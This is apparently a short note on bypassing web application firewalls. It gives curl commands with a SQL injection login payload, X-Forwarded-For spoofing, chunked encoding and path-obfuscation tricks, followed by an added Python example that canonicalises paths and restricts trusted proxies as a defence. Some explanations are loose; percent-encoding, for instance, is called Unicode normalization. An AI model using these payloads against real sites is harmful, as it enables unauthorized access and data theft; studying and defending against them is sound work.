This cURL command has been used to bypass a WAF.
curl -X POST "https://target.com/login" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Content-Type: application/json" \
--data-raw '{"username":"admin'\'' OR 1=1--", "password":"any"}'
The X-Forwarded-For header tricks the web firewall into thinking that the request comes from a trusted source, which only works when the WAF trusts forwarding headers supplied by the client. The data also contains a SQLi payload that does not break the query. You can also add random but valid headers to bypass WAFs that only block requests with missing or abnormal headers:
curl -X GET "https://target.com/admin" \
-H "Random-Header: $(openssl rand -hex 8)" \
-H "Referer: https://google.com"
You can also use chunked transfer encoding against some WAFs:
curl -X POST "https://target.com/api" \
-H "Transfer-Encoding: chunked" \
--data-binary @malicious_payload.txt
To bypass case-sensitive regex, you can use mixed case and a dot-dot segment in the path:
curl -X GET "https://target.com/ADMIN/../LoGiN" \
-H "User-Agent: cURL/7.68.0"
You can also use Unicode normalization to confuse the firewall (the path below is the percent-encoded form of user):
curl -X GET "https://target.com/%75%73%65%72" \
-H "Accept: */*"
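On the defending side, the header and path tricks above stop working once rules are evaluated against the canonical request rather than the raw bytes. The following is an added example, not part of the original note: the trusted proxy range, the protected prefixes and all function names are assumptions, and case folding assumes the backend routes paths case-insensitively.

```python
import ipaddress
import posixpath
from urllib.parse import unquote

# Assumptions for this example: one reverse proxy range and two protected paths.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
PROTECTED_PREFIXES = ("/admin", "/login")


def canonical_path(raw_path: str) -> str:
    """Return the path in the form access rules should be matched against."""
    path = raw_path
    for _ in range(5):  # bounded: repeated decoding catches double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Collapse "." / ".." segments and duplicate slashes, then fold case.
    return posixpath.normpath("/" + path.lstrip("/")).lower()


def client_ip(peer_ip: str, headers: dict) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy."""
    xff = {k.lower(): v for k, v in headers.items()}.get("x-forwarded-for")
    peer = ipaddress.ip_address(peer_ip)
    if xff and any(peer in net for net in TRUSTED_PROXIES):
        # The rightmost entry is the address our own proxy appended.
        return xff.split(",")[-1].strip()
    return peer_ip


def inspect_request(peer_ip: str, raw_path: str, headers: dict) -> dict:
    """Summarise what access rules should be evaluated against."""
    path = canonical_path(raw_path)
    protected = any(path == p or path.startswith(p + "/")
                    for p in PROTECTED_PREFIXES)
    return {"ip": client_ip(peer_ip, headers), "path": path,
            "protected": protected}


if __name__ == "__main__":
    # Constructed requests mirroring the header and path tricks on this page.
    hdrs = {"X-Forwarded-For": "127.0.0.1"}
    print(inspect_request("203.0.113.7", "/ADMIN/../LoGiN", hdrs))
    print(inspect_request("203.0.113.7", "/%75%73%65%72", hdrs))
```

Chunked request bodies need the same treatment: inspect the reassembled body, not the individual chunks.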